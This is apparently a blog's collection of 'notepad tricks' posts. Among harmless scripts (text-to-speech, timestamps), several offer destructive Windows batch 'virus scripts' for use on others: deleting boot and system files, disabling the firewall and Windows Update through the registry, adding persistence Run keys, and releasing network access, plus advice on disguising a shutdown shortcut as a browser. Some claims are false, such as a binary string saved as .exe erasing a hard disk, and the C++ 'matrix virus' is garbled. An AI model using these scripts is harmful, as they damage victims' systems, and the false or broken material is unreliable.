Tampilkan postingan dengan label NOTEPAD TRICKS. Tampilkan semua postingan
Tampilkan postingan dengan label NOTEPAD TRICKS. Tampilkan semua postingan

New Best 30 + Notepad Tricks 2015 !!!

Posted by Unknown Sabtu, 28 September 2013 0 komentar
Hello friends,

 Today I'm gonna share a new trick  where you can see the date and time when you edited your  documents in notepad in just few simple steps, check out below for the trick.

1. Open the Notepad Document and now enter the code (.LOG) without any bracket.

2. Now save the file name as clock in a new folder of a drive.

3. Its done now open the notepad file, here you can see the date and time with in the document.




4. Enjoy he trick and share with your friends...

**More than 25 cool tricks are waiting for you... just Click Here to enjoy tricks


Baca Selengkapnya ....

New Surprising Notepad trick !!

Posted by Unknown Selasa, 09 Juli 2013 0 komentar
Friends,

 Sharing with you all a trick related  to notepad. If you are thinking what's this surprising sounds about then its just that I'm not gonna say what will be the output of it , you are going to try out and share your experience with us. Just follow few steps and try out now

1) Open Notepad.

2)Type this follow the given Code into Notepad :

01001011000111110010010101010101010000011111100000

3) Save it as( .exe   )

4) Now it is done.

5) Now open that folder.



NOTE :- Save as name .exe  is most important !
                *Share your experience with us and say what happen when u open it*

Baca Selengkapnya ....

Best New Notepad Tricks 2014

Posted by Unknown Minggu, 30 Juni 2013 0 komentar
Today I'm share a simple and very useful trick to format your hard disk with the help of notepad, just by following few simple steps.

Note: *The entire HDD will be erased, so be careful before applying those steps.


First Open Notepad and type the below code:

* Code : 01001011000111110010010101010101010000011111100000


*Save As it as anything.EXE


* Now  run the file.

* Now the HDD is completely Erased .

Baca Selengkapnya ....

Chat with Friends through MS DOS Command Prompt/Best Notepad trick

Posted by Unknown Jumat, 03 Mei 2013 0 komentar
Hello friends,
 

Here is a trick where you can  now Chat with your Friends through MS DOS Command Prompt , if you are thinking how is that possible then just check out here ...

1) All you need is your friend's IP Address and your Command Prompt.

2) Open Notepad and write this code as it is.....!

@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A

3) Now save this as "Messenger.Bat".

4) Open Command Prompt.

5) Drag this file (.bat file) over to Command Prompt and press Enter.

6) Now, type the IP Address of the computer you want to contact and press enter.

7) Now all you need to do is type your message and press Enter.
Start Chatting.


8) You would then see something like show in the image above.

Baca Selengkapnya ....

Trick to disable right click in mouse./Notepad tricks 2013

Posted by Unknown Sabtu, 30 Maret 2013 0 komentar
Hello Friends,

 Sharing with you all a new trick on  Notepad where you can disable right click on mouse. just check out few simple steps shown below and try out...

1. Open your Notepad.

2. Copy and past below code in Notepad.

rem
rem Disable Mouse
set key=”HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass”
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem

3. Save this file as virus.bat save in your system Had Disc any where.

4. You have Done,Now open this folder and check out.

 For more cool tricks based on notepad check out here

Baca Selengkapnya ....

Best Notepad trick 2013

Posted by Unknown Sabtu, 22 Desember 2012 0 komentar
Make your keyboard light blinking


Steps to follow
1. open a notepad
2. copy these codes to notepad.
Set wshShell =wscript.CreateObject("WScript.Shell")  
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop
3. Now save it as .vbs file. ex- keyboard.vbs
4. Double click the created file.

Baca Selengkapnya ....

Notepad tricks/Top five notepad tricks

Posted by Unknown Kamis, 21 Juni 2012 0 komentar
1. Code to disable firewall in your or your victims system

Copy this code in Notepad

CODE:
net stop "Security center"
net stop SharedAccess
> "%Temp%.kill.reg" ECHO REGEDIT4
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSharedAccess]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceswuauserv]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlset001serviceswscsvc]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.kill.reg"
del "%Temp%.kill.reg"
del %0


Save it as *.bat or *.exe and then try....

Note:This trick disables firewall permanently..Beware


2. Change Your Processor to Intel Xeon 8.0 GHZ or any 

Type following lines in notepad

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0]

"ProcessorNameString"="Intel Xeon 8.0GHz"
and save as processor.reg and run it.

To see new processor name Click on “My computer” and right click and choose property,
which will show “ Intel Xeon 8.0 GHZ. (It is t...emparory change only)

Note: For permanent changes regedit /s processor.reg in notepad and save as phack.bat
and put both files(processor.reg and phack.bat)

In windows startup folder [ Documents abd settings\all users\start meny\programs\startup ]
which will run whenever the system restarts.

3.CREATE HIDDEN DATA IN NOTEPAD

IN CMD
type
notepad xxx :hidden
("replace xxx with the path of the text file to be create eg D:\)
then system ask to create a new txt file " click yes"
then type any secret datas on the opened text file
then save it
no one can read it by simply opening
TO READ DATA
OPEN CMD
type
notepad xxx :hidden
(then text file with data will be opened)

4. TO DELETE AN AUTO RUN FILE FROM A DRIVE / USB

@echo off
echo
ECHO ENTER THE USB\DRIVE LETTER TO REMOVE AUTORUN
echo
SET /P X=
attrib -h -r -s %X%:\autorun.inf
DEL %X%:\autorun.inf
pause
SAVE IT AS AUTO.BAT
OPEN IT

5. FLASHING LIGHTS

open notepad

write this
Set wshShell =wscript.CreateObject("WScript.Shell")
for i=1 to 25
if i<10 then
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
End if
Next
save it as light.vbs
then open it
u can see the lights of ur keyboard is flashing

Baca Selengkapnya ....

Notepad tricks/Trick to make your pc speak !!!

Posted by Unknown Sabtu, 17 Maret 2012 0 komentar
Make your PC speak

Now you can create your own text to speech converter software to make your computer speak whatever you type.

It’s pretty cool. Just run this script-and make it read any funny sentence.Copy the code given below in notepad and save it as any name. vbs . Make sure that you save it as .vbs file.

Dim message, sapi
message=InputBox("What do you want me to say?","Speak to Me")
Set sapi=CreateObject("sapi.spvoice")
sapi.Speak message


After making a vbs file just double click on that file and type anything you want in the textbox.

Baca Selengkapnya ....

Notepad tricks/Trick to convert text message to voice message

Posted by Unknown Kamis, 08 Maret 2012 0 komentar
Convert the text message to voice message.

Step1:Open the Notepad.

Step2:Then copy-paste the following code in the text area.

Dim msg, sapi
msg=InputBox("Enter your text for conversion: For Ex.Shobhit Saxena","Shobhit Saxena Text2Voice Converter")
Set sapi=CreateObject("sapi.spvoice")
sapi.Speak msg

Step3:Open File>Save as

Step4:Then in the Save As dialog box enter any name for the file with the extension .vbs and click on Save.

Step5:Then open the file that you had saved.

Step6:Enter the text which you want to convert to speech.

Step7:Click on OK button.

Baca Selengkapnya ....

Notepad tricks/Folder Lock without any Software .

Posted by Unknown Selasa, 31 Januari 2012 0 komentar
Open Notepad and copy the below code and save as locker.bat. At first time start it will create folder with Locker automatically for u. Don't forget to change your password in the code its shown the place where to type your password.
after creation of Locker folder again click on the locker.bat.it will ask.press Y then Locker folder will be disappeared.again to get it click on locker.bat. and give ur password u will get the folder again.


cls
@ECHO OFF
title Folder Locker
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==type your password here goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End

Baca Selengkapnya ....

Notepad tricks/creating virus by using notepad

Posted by Unknown Rabu, 04 Januari 2012 0 komentar

HERE THERE ARE SOME EXCELLENT VIRUS SCRIPTS OF WEBS MOST DANGEROUS SCRIPTS ALSO INCLUDED IN IT

How to crash a PC Forever !

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

Open up notepad and copy and paste that. Save it as a .bat file.
This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart.
REMEMBER - DO NOT CLICK THIS FILE.
**Also remember this might not work with vista.**

How to stop someone's internet access:

@Echo off
Ipconfig /release

Save that as a .bat and send it to someone. They're IP address will be lost, and therefore they won't be able to fix it

However, this is VERY easy to fix. Simply type in IPconfig /renew


ShutDown PC million Times:

1.right click on the desktop
2.click shortcut
you will get a dialogue box, write in it: shutdown -s -t 1000 c "any comment u want" then press next
note: this "1000" i wrote is the time in seconds needed for ur computer to shutdown,u can put any number u want...
3.u will get another dialogue box, write in it: Internet Explorer and press finish
4.u will find the icon on ur desktop, dont open it, just right click on it and press properties>change icon>select the icon the the internet explorer and the press apply then ok
try to open it, it is a virus
PS: the only way 2 stop ur computer from shutting down is to go 2 start>run>type: shutdown -a

Freeze someone's desktop:

This is a funny trick, u can freeze someone's desktop

1.close everything u r working in, and work on desktop. so click on prtscr on ur keyboard.
2.go to paint and click on edit then paste
3.save this file as (name).bmp and close the paint.
3.now in the desktop, we have 2 remove desktop icons and shortcuts, so right click on the mouse and then properties, click on desktop then select customize desktop.
4.uncheck all the boxes in desktop icons and press ok. then press apply then ok
.
5.now to remove the shortcuts in the desktop, go to start and select My Computer, then click on c: right click on ur mouse and select new folder, write it any name
6.now go to desktop & select all da icons and right click on them then press cut,go to c: and paste them in the folder dat u created then close the window.
7.now to put the fake desktop image and remove the taskbar, so right click on desktop and gp to properties, now go to desktop and select Browse, select the file that u saved then press appply then ok. now to remove the windows taskbar, right click on the taskbar and go 2 properties, then select autohide the taskbar and then apply then ok
now all the icons r fake and the user will think that his desktop is freezed
enjoy it.!

SHUT UR INTERNET PERMANENTLY:

This is a slightly more advanced one. It shuts down your internet permanately. I tried it on myself accidently, i knew what it did, and it still took me a couple of days to get my internet back. works best on XP, not tested on vista or 7.

EDIT: At the bottom put a rickroll site or something. BTW, that 3rd line, isnt what disables the internet permanately. It is somethinge else, that just provides a fast response to shut down any connections.

@echo off
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v MiXedVeX /t REG_SZ /d %systemroot%\HaloTrialScoreChangerV1 /f > nul
start iexpress (website of your choice)
ipconfig /release
del "C:\Program Files\Microsoft Games
del "C:Nexon
del "C:\Program Files\Xfire
del "C:\Program Files\Adobe"
del "C:\Program Files\Internet Explorer"
del "C:\Program Files\Mozilla Firefox"
del "C:\WINDOWS"
del "C:\WINDOWS\system32"
del "C:\WINDOWS\system32\cmd"
del "C:\WINDOWS\system32\iexpress"
del "C:\WINDOWS\system32\sndvol32"
del "C:\WINDOWS\system32\sndrec32"
del "C:\WINDOWS\system32\Restore\rstrui"
del "C:\WINDOWS\system32\wupdmgr"
del "C:\WINDOWS\system32\desktop"
del "C:\WINDOWS\java"
del "C:\WINDOWS\Media"
del "C:\WINDOWS\Resources"
del "C:\WINDOWS\system"
del "C:\drivers"
del "C:\drv"
del "C:\SYSINFO"
del "C:\Program Files"
echo ipconfig/release_all>>c:windowswimn32.bat
net stop "Security Center"
net stop SharedAccess
> "%Temp%.kill.reg" ECHO REGEDIT4
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesS haredAccess]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesw uauserv]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsv c]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.kill.reg"
del "%Temp%.kill.reg"
del %0
echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
:a
start iexpress (website of your choice)
goto a

MAKING MOST DANGEROUS VIRUS CALLED MATRIX:

Warning - Do not run it on your computer


1-Open notepad
2-Put in this code

#include
#include
#include
#include
#include
#include
#include
using namespace std;

int main()
{ keybd_event(VK_MENU,0x38,0,0);
keybd_event(VK_RETURN,0x1c,0,0);
keybd_event(VK_RETURN,0x1c,KEYEVENTF_KEYUP,0);
keybd_event(VK_MENU,0x38,KEYEVENTF_KEYUP,0);
HANDLE outToScreen;
outToScreen = GetStdHandle(STD_OUTPUT_HANDLE);

{
char buffer[255];
char inputFile[]="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\rawr.bat";
ifstream input(inputFile);
if (!input)
{
{
ofstream fp("C:\Documents and Settings\All Users\Start Menu\Programs\Startup\rawr.bat", ios::app);
fp
fp
fp
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
}
}
}

{
char buffer[255];
char inputFile[]="C:\rawr.exe";
ifstream input(inputFile);
if (!input)
{
{
{
ofstream fp("CLICK.bat", ios::app);
fp
fp
fp
fp
}
system("START CLICK.bat");
main();
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
system("call shutdown.exe -S");
goto START;
}
}
}

START:{
for(int i = 0; i < 1; i++)
{
int num = (rand() % 10);
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN | FOREGROUND_INTENSITY);
cout
cout
cout
cout
cout
cout
cout
cout
cout
cout
cout
cout
Sleep(60);
}
}
for ( int j = 0; j < 5; j++)
{
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN);
int number = (rand() % 24);
cout
}
goto START;



3-save it as matrix.bat
4-finish


!!!NOTE!!!

AS IT WAS TOO DANGEROUS THE ACTUAL HEADER FILES FOR THIS SCRIPT ARE NOT GIVEN

AND IF U WANT TO TRY THIS SCRIPT U CAN JUST USE OF HEADER FILES SUCH AS STDIN,STDLIB,CONIO , AND STUFF LIKE THAT

Baca Selengkapnya ....
Trik SEO Terbaru support Online Shop Baju Wanita - Original design by Bamz | Copyright of android app jorte.